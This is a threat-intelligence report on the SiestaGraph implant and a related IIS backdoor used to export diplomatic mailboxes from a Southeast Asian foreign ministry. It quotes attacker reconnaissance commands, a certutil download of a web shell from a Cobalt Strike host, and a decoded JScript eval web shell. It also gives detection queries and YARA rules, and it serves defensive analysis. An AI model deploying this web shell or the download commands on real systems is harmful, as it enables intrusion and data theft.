+All three of these files ( **OfficeClient.exe** , **Officeclient.exe** , and **OfficeCore.exe** ) have an original PE file name of **windowss.exe** , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because of the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.
+
+As of December 8, 2022, we observed a variant of SiestaGraph in [VirusTotal](https://www.virustotal.com/gui/file/50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54), uploaded from the Netherlands on October 14, 2022. SiestaGraph makes use of a .NET API [library](https://github.com/KoenZomers/OneDriveAPI) that functions as an alternative to using Microsoft Graph, which is an API to interact with Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.
+
+#### Internal reconnaissance
+
+On November 28, 2022, the threat actor began performing internal reconnaissance by issuing standard commands such as **whoami** , **hostname** , **tasklist** , etc. These commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing the commands.
+
+```
+cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&whoami
+
+cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&hostname
+
+cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&tasklist
+```
+
+Additional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies and consulates abroad. There has been no indication that this information has been subsequently exploited for additional access or information at this time.
+
+On November 29, 2022, the threat actor began collecting domain user and group information with the **net user** and **net group** commands, again issued as child processes of **w3wp.exe** and **cmd.exe**. These commands confirmed that this was not an entirely scripted campaign and included an active operator by the fact that they forgot to add the **/domain** syntax to two of the 20 **net user** commands. While the **net user** command does not require the **/domain** syntax, the fact that this was only on two of the 20 occurrences, it was likely an oversight by the operator. This was the first of multiple typographical errors observed throughout this campaign.
+
+![Example of a typographical error (“yupe” instead of “type”) showing an active operator](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image5.jpg)
+
+#### Exporting Exchange mailboxes
+
+On November 28, 2022, the threat actor started to export user mailboxes, again using the **w3wp.exe** process as a parent for **cmd.exe** , and finally Powershell. The threat actor added the **Microsoft.Exchange.Management.PowerShell.SnapIn** module. This module provides the ability to manage Exchange functions using Powershell and was used to export the mailboxes of targeted Foreign Service Officers and saved them as PST files.
+
+![Abnormal process spawned from IIS Worker](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image11.jpg)
+
+In the above example, the **Received -gt** and **Sent -gt** dates timebox the collection window as all emails sent and received after ( **gt** is an acronym for “greater than”) November 15, 2022. The timeboxing was not uniform across all mailboxes and this process was repeated multiple times. Again, in the above example from November 28, 2022, the timebox was for all sent and received emails from November 15, 2022, to the current date (November 28, 2022); on December 6, 2022, the mailbox was exported again, this time with a **gt** value of November 28, 2022, which was the date of the last export.
+
+In another example in this phase, the threat actors targeted a mailbox called **csirt**. While this is unconfirmed, “csirt” is commonly an acronym for Cyber Security Incident Response Team.
+
+![CSIRT mailbox exported](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image6.jpg)
+
+Taking into consideration the timebox used on the **csirt** export, if this is the industry standard acronym of CSIRT, the intrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if their intrusion had been detected.
+
+Throughout this phase, a total of 24 mailboxes were exported.
+
+Once the mailboxes were exported, the threat actor created a 7zip archive called **7.tmp** with a password of **huebfkaudfbaksidfabsdf**.
+
+![Creating password-protected Zip archive](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image4.jpg)
+
+Three of the mailboxes, one of which being the **csirt** mailbox, were archived individually. These three mailboxes were archived with a **.log.rar** or **.log** file extension.
+
+![Targeted mailboxes archived individually (partially obfuscated as two PST files have user initials)](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image14.jpg)
+
+Finally, the threat actor created a 200m 7zip archive called **o.7z** and added the previously created, password-protected, **7.tmp** archive to it.
+
+![o.7z created from 7.tmp](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image13.jpg)
+
+#### IIS backdoor module
+
+On November 28, 2022, we observed the loading of two DLL files, **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** through the execution of the **iissvcs** services using **svchost.exe**. Both **Microsoft.Exchange.Entities.Content.dll** and **iisrehv.dll** were loaded using the **iissvcs** module of the Windows Service Host through the execution of **C:\Windows\system32\svchost.exe -k iissvcs**. These malicious IIS modules are loosely based on the [DoorMe](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme) IIS backdoor.
+
+![DoorMe strings embedded in IIS backdoor module](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image2.jpg)
+
+> For context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host websites and server-side applications. Starting on version 7.0, Microsoft extended IIS by adding a modular architecture that allows individual modules to be added or removed in order to achieve functionality depending on an environment’s needs. These modules represent individual features that the server can then use to process incoming requests.
+
+During the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all incoming HTTP requests. Depending on a tailor-made request by the operator, the malware will activate and process commands. This approach can be challenging for organizations as there is usually low visibility in terms of monitoring and a lack of prevention capabilities on these types of endpoints. In order to install this backdoor, it requires administrator rights and for the module to be placed inside the **%windir%\System32\inetsrv** directory, based on the observed artifacts we believe initial access was gained through server exploitation from a recent wave of Microsoft Exchange RCE exploit usage.
+
+The malicious module (C++ DLL) is first loaded through its export, [RegisterModule](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function). This function is responsible for setting up the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the backdoor is implemented using the [CGlobalModule class](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class) under the event handler [OnGlobalPreBeginRequest](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). By overriding this event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all exists in this function, including cookie validation, parsing commands, and calling underlying command functions.
+
+![Class methods including malicious OnGlobalPreBeginRequest method](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image10.jpg)
+
+The malware implements an authentication mechanism based on a specific cookie name that contains the authentication key. This malicious IIS module checks for every incoming HTTP request for the specified cookie name, and it returns a success message in case of a GET request. The GET request is used as a way to test the backdoor’s status for the operator, and it also returns back the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST requests as data.
+
+![GET HTTP request with the authentication cookie](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image8.jpg)
+
+Throughout our analysis, we discovered old samples on VirusTotal relating to this backdoor. Although they have the same authentication and logic, they implement different functionalities. The cookie name used for authentication was also changed alongside the handled commands.
+
+This observed backdoor implements four different commands, and the symbol PIPE is used to separate the command ID and its arguments.
+
+| ID   | Parameter                           | Description                                                                                                     |
+| ---- | ----------------------------------- | --------------------------------------------------------------------------------------------------------------- |
+| 0x42 | Expects the string GenBeaconOptions | Generates a unique Globally Unique Identifier used to identify the infected machine and send it to the attacker |
+| 0x43 | Shellcode blob                      | Execute the shellcode blob passed as a parameter in the current process                                         |
+| 0x44 | N/A                                 | Write and Read from a specified named pipe                                                                      |
+| 0x63 | Shellcode blob in chunks            | Similar to command ID: 0x43, this command can receive a blob of shellcode in chunks when fully received         |
+
+From our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly **NtAllocateVirtualMemory** , **NtProtectVirtualMemory** , and **NtCreateThreadEx** , to allocate the required shellcode memory and to create the executing thread.
+
+#### kk2.exe
+
+On November 30, 2022, an unknown binary called **kk2.exe** was executed on an Exchange server. While we have been unable to collect **kk2.exe** as of this writing, we can see that it was used to load a vulnerable driver that can be used to monitor and terminate processes from kernel mode, **mhyprot.sys**. It is unclear if **mhyprot.sys** is downloaded, or embedded into, **kk2.exe**.
+
+![kk2.exe loading the vulnerable mhyprot.sys driver](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image3.jpg)
+
+**mhyprot.sys** was detected by Elastic’s open code [Windows.VulnDriver.Mhyprot YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_VulnDriver_Mhyprot.yar), released in August 2022.
+
+> For more information on how vulnerable drivers are used for intrusions, check out the [Stopping Vulnerable Driver Attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) research Joe Desimone published in September 2022.
+
+As stated previously, we could not collect **kk2.exe** for analysis but it is likely that it used **mhyprot.sys** to escalate to kernel mode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or entire intrusion, from detection.
+
+#### Web shells
+
+The following section highlights multiple attempts by the threat actors to install a web shell as a back door into the environment if they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed. It is unclear what the reasons for the failures are. We’ll not cover every attempt at loading a web shell, as several of them were very similar, but we’ll highlight the shifts in approaches.
+
+The first attempt was to use the Microsoft **certutil** tool to download an Active Server Pages (ASPX) file ( **config.aspx** ) from a remote host (**185.239.70[.]229**) and save it as the **error.aspx** page on the Exchange Control Panel’s webserver. Because this IP address is a [known](https://threatfox.abuse.ch/ioc/1023850/) Cobalt Strike server, it may have been blocked by network defense architecture, leading to further attempts to overwrite **error.aspx**.
+
+![Attempt to overwrite error.aspx with config.aspx from a known Cobalt Strike server](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image9.jpg)
+
+After attempting to use **config.aspx** from a Cobalt Strike C2 server, the threat actors attempted to insert Base64 encoded Javascript into a text file ( **1.txt** ), use **certutil** to decode the Base64 encoded Javascript ( **2.aspx** ), and then overwrite **error.aspx** with **2.aspx**. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.
+
+![Attempt to overwrite error.aspx with Javascript file](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image15.jpg)
+
+The Base64 encoded string decoded into the following Javascript:
+
+```
+<%@ Page Language="Jscript" Debug=true%>
+<%
+var TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';
+var ZZXG=Request.Form("daad");
+var VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);
+eval(ZZXG, VAXN);
+%
+```
+
+The preceding code is a simple web shell leveraging the [eval Method](<https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2008/b51a45x6(v=vs.90)>)to evaluate JScript code sent through the POST parameter **daad**. Variations of this technique were attempted multiple times. Other attempts were observed to load [obfuscated versions](https://github.com/ysrc/webshell-sample/blob/master/aspx/54a5620d4ea42e41beac08d8b1240b642dd6fd7c.aspx#L11) of the [China Chopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper) and [Godzilla](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell) [web shells](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx).
+
+### December 1–4, 2022
+
+### DLL side-loading
+
+On December 2, 2022, on two Domain Controllers, we observed a new DLL ( **log.dll** ) being side loaded by a legitimate, but an 11-year-old, version of the Bitdefender Crash Handler executable (compiled name: **BDReinit.exe** ), **13802 AR.exe**. Once executed, it will move to the **C:\ProgramData\OfficeDriver\*\* directory, rename itself **svchost.exe\*\* , and install itself as a service.
+
+Once **log.dll** is loaded, it will spawn the Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe** and injects into them which triggers a memory shellcode detection.
+
+_Updated 2/2/2023: In our_ [_updated research into SIESTAGRAPH, DOORME, and SHADOWPAD_](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)_, we identify_ _ **log.dll** _ _as part of the SHADOWPAD malware family._
+
+On December 2, 2022, another unknown DLL, **Loader.any** , was interactively executed with an Administrative account using **rundll32.exe**. **Loader.any** was observed executing two times on a Domain Controller and was then deleted interactively.
+
+On December 3, 2022, we observed another malicious file, **APerfectDayBase.dll**. While this is a known malicious file, the execution was not observed. **APerfectDayBase.dll** is the legitimate name of a DLL in the import table of a benign-looking program, **AlarmClock.exe**.
+
+![Import table for AlarmClock.exe](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image7.jpg)
+
+This naming appears to be an attempt to make the malicious DLL look legitimate and likely to leverage **AlarmClock.exe** as a side-loading target. Testing has confirmed that the DLL can be side-loaded with **AlarmClock.exe**. While not malicious, we are including the hash for **AlarmClock.exe** in the Indicators table as its presence could be used purely as a side-loading vehicle for malicious DLL, **APerfectDayBase.dll**.
+
+## Victimology and targeting motivations
+
+### Diamond model
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
+
+![REF2924 diamond model](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/ref2924_diamond.jpg)
+
+### Victimology
+
+The victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence collection efforts on personnel and positions of authority related to the victim's relationship with [ASEAN](https://asean.org/what-we-do) (Association of Southeast Asian Nations).
+
+ASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states. This has been expressed through economic, security, trade, and educational cooperation with expanding international and domestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently seeking accession. It is exerting this international influence over the development of a [Regional Comprehensive Economic Partnership](https://rcepsec.org/about/) trade agreement with a broader periphery of member nations (16 members and 2 applicants).
+
+![ASEAN and RCEP member countries](/assets/images/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry/image12.jpg)
+
+Below is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their mailboxes were exported.
+
+| User    | Collection Window                             | Collection Date(s)  |
+| ------- | --------------------------------------------- | ------------------- |
+| User 1  | 11/1/2022 - 11/28/202211/29/2022 - 12/6/2022  | 11/28/202212/6/2022 |
+| User 2  | 11/1/2022 - 11/28/2022                        | 11/28/2022          |
+| User 3  | 11/1/2022 - 11/28/2022                        | 11/28/2022          |
+| User 4  | 11/15/2022 - 11/28/2022                       | 11/28/2022          |
+| User 5  | 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 | 11/28/202212/6/2022 |
+| User 6  | 11/15/2022 - 11/28/2022                       | 11/28/2022          |
+| User 7  | 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 | 11/28/202212/6/2022 |
+| User 8  | 11/15/2022 - 11/28/2022                       | 11/28/2022          |
+| User 9  | 11/15/2022 - 11/28/2022                       | 11/28/2022          |
+| User 10 | 9/15/2022 - 11/29/2022                        | 11/29/2022          |
+| User 11 | 9/15/2022 - 11/29/2022                        | 11/29/2022          |
+| User 12 | 9/15/2022 - 11/29/2022                        | 11/29/2022          |
+| User 13 | 9/1/2022 - 11/30/2022                         | 11/30/2022          |
+| User 14 | 9/1/2022 - 11/30/2022                         | 11/30/2022          |
+| User 15 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 16 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 17 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 18 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 19 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 20 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 21 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 22 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 23 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+| User 24 | 11/29/2022 - 12/6/2022                        | 12/6/2022           |
+
+As reflected above, we observed Users 1, 5, and 7 targeted twice each indicating that the contents of their mailboxes were of particular interest. This could be the result of pre-intrusion reconnaissance or once the initial traunch of mailboxes was reviewed by the threat actor, they decided to continue collecting on those users.
+
+### Targeting motivation
+
+There is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be motivated by the purpose of diplomatic intelligence gathering. There are a number of potential adversaries who would find a nation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous in furthering their own regional influence, national security, and domestic goals.
+
+If the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it could find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade agreements.
+
+ASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization has not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and some wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the threat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in ASEAN and any individual member would almost certainly be multifaceted covering government functions from immigration to agriculture, to technology, to sociopolitical considerations such as human rights.
+
+## Detection logic
+
+### Prevention rules
+
+- [Potential Masquerading as SVCHOST](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_svchost.toml)
+- [Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)
+- [Process Execution from an Unusual Directory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)
+
+### Detection rules
+
+- [Potential Credential Access via DCSync](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_dcsync_replication_rights.toml)
+- [Windows Service Installed via an Unusual Client](https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml)
+- [Suspicious Microsoft IIS Worker Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_microsoft_iis_worker_descendant.toml)
+- [Encrypting Files with WinRar or 7z](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_winrar_encryption.toml)
+- [Exporting Exchange Mailbox via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_email_powershell_exchange_mailbox.toml)
+- [Windows Network Enumeration](https://github.com/elastic/detection-rules/blob/main/rules/windows/discovery_net_view.toml)
+- [NTDS or SAM Database File Copied](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml)
+- [Suspicious CertUtil Commands](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_suspicious_certutil_commands.toml)
+
+### Hunting queries
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+#### KQL query
+
+Using the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious by Elastic Defend (even if Elastic Defend is in “Detect Only” mode).
+
+The proceeding and preceding wildcards (\*) can be an expensive search over a large number of events.
+
+```
+event.code : “malicious_file” and event.action : "load" and process.name : “w3wp.exe” and process.command_line.wildcard : (*MSExchange* or *SharePoint*)
+```
+
+#### EQL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.
+
+```
+# Hunt for DLL Sideloading using the observed DLLs:
+
+library where
+ dll.code_signature.exists == false and
+ process.code_signature.trusted == true and
+ dll.name : ("log.dll", "APerfectDayBase.dll") and
+ process.executable :
+           ("?:\\Windows\\Tasks\\*",
+            "?:\\Users\\*",
+            "?:\\ProgramData\\*")
+
+# Hunt for scheduled task or service from a suspicious path:
+
+process where event.type == "start" and
+ process.executable : ("?:\\Windows\\Tasks\\*", "?:\\Users\\Public\\*", "?:\\ProgramData\\Microsoft\\*") and
+ (process.parent.args : "Schedule" or process.parent.name : "services.exe")
+
+# Hunt for the SiestaGraph compiled file name and running as a scheduled task:
+
+process where event.type == "start" and
+ process.pe.original_file_name : "windowss.exe" and not process.name : "windowss.exe" and process.parent.args : "Schedule"
+
+# Hunt for unsigned executable using Microsoft Graph API:
+
+network where event.action == "lookup_result" and
+ dns.question.name : "graph.microsoft.com" and process.code_signature.exists == false
+```
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the [SiestaGraph malware implant](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar) and the [DoorMe IIS backdoor](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar).
+
+```
+rule Windows_Trojan_DoorMe {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-12-09"
+        last_modified = "2022-12-15"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "DoorMe"
+        threat_name = "Windows.Trojan.DoorMe"
+        reference_sample = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f"
+    strings:
+        $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }
+        $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }
+        $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }
+        $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }
+        $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }
+        $str_0 = ".?AVDoorme@@" ascii fullword
+    condition:
+        3 of ($seq*) or 1 of ($str*)
+}
+
+rule Windows_Trojan_SiestaGraph {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-12-14"
+        last_modified = "2022-12-15"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "SiestaGraph"
+        threat_name = "Windows.Trojan.SiestaGraph"
+        reference_sample = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54"
+    strings:
+        $a1 = "downloadAsync" ascii nocase fullword
+        $a2 = "UploadxAsync" ascii nocase fullword
+        $a3 = "GetAllDriveRootChildren" ascii fullword
+        $a4 = "GetDriveRoot" ascii fullword
+        $a5 = "sendsession" wide fullword
+        $b1 = "ListDrives" wide fullword
+        $b2 = "Del OK" wide fullword
+        $b3 = "createEmailDraft" ascii fullword
+        $b4 = "delMail" ascii fullword
+    condition:
+        all of ($a*) and 2 of ($b*)
+}
+```
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+- [Credential access](https://attack.mitre.org/tactics/TA0006)
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)
+- [Collection](https://attack.mitre.org/tactics/TA0009)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Gather host information](https://attack.mitre.org/techniques/T1592/)
+- [Gather victim information](https://attack.mitre.org/techniques/T1589/)
+- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)
+- [Gather victim org information](https://attack.mitre.org/techniques/T1591/004/)
+- [Exploit public-facing application](https://attack.mitre.org/techniques/T1190/)
+- [Command and Scripting Interpreter: Windows command-shell](https://attack.mitre.org/techniques/T1059/001/)
+- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/003/)
+- [Network share discovery](https://attack.mitre.org/techniques/T1135/)
+- [Remote system discovery](https://attack.mitre.org/techniques/T1018/)
+- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)
+- [Process discovery](https://attack.mitre.org/techniques/T1057/)
+- [Remote services: SMB/Windows admin shares](https://attack.mitre.org/techniques/T1021/002/)
+- [System service discovery](https://attack.mitre.org/techniques/T1007/)
+- [System owner/user discovery](https://attack.mitre.org/techniques/T1033/)
+- [Hijack execution flow: DLL side-loading](https://attack.mitre.org/techniques/T1574/002/)
+- [Masquerading: Masquerade task or service](https://attack.mitre.org/techniques/T1036/004/)
+- [Process injection](https://attack.mitre.org/techniques/T1055/)
+- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)
+- [Deobfuscate/decode files or information](https://attack.mitre.org/techniques/T1140/)
+- [Virtualization/sandbox evasion: Time based Evasion](https://attack.mitre.org/techniques/T1497/003/)
+- [OS credential dumping: NTDS](https://attack.mitre.org/techniques/T1003/003/)
+- [OS credential dumping: Security Account Manager](https://attack.mitre.org/techniques/T1003/002/)
+- [OS credential dumping: DCSync](https://attack.mitre.org/techniques/T1003/006/)
+- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)
+- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)
+- [Valid accounts](https://attack.mitre.org/techniques/T1078/)
+- [Server software component: IIS components](https://attack.mitre.org/techniques/T1505/004/)
+- [Server software component: Web shell](https://attack.mitre.org/techniques/T1505/003/)
+- [Email collection: Local email collection](https://attack.mitre.org/techniques/T1114/001/)
+- [Archive collected data: Archive via utility](https://attack.mitre.org/techniques/T1560/001/)
+- [Screen capture](https://attack.mitre.org/techniques/T1113/)
+- [Web service](https://attack.mitre.org/techniques/T1102/)
+- [Application layer protocol: Web protocols](https://attack.mitre.org/techniques/T1071/001/)
+
+## References
+
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme)
+- [https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks)
+- [https://threatfox.abuse.ch/ioc/1023850/](https://threatfox.abuse.ch/ioc/1023850/)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell)
+- [https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx)
+
+## Observables
+
+All observables are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc0eb869ac242975f/637bf8b1fa033a109b5d94bd/ref4526-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Indicator                                                        | Type    | Name                                    | Reference                                                 |
+| ---------------------------------------------------------------- | ------- | --------------------------------------- | --------------------------------------------------------- |
+| 1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf | SHA-256 | OfficeClient.exe and OfficeCore.exe     | SIESTAGRAPH                                               |
+| 7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950 | SHA-256 | Officeclient.exe                        | SIESTAGRAPH                                               |
+| f9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094 | SHA-256 | officeup.exe                            | SIESTAGRAPH                                               |
+| c283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0 | SHA-256 | Microsoft.Exchange.Entities.Content.dll | DOORME                                                    |
+| 4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d | SHA-256 | iisrehv.dll                             | SessionManager                                            |
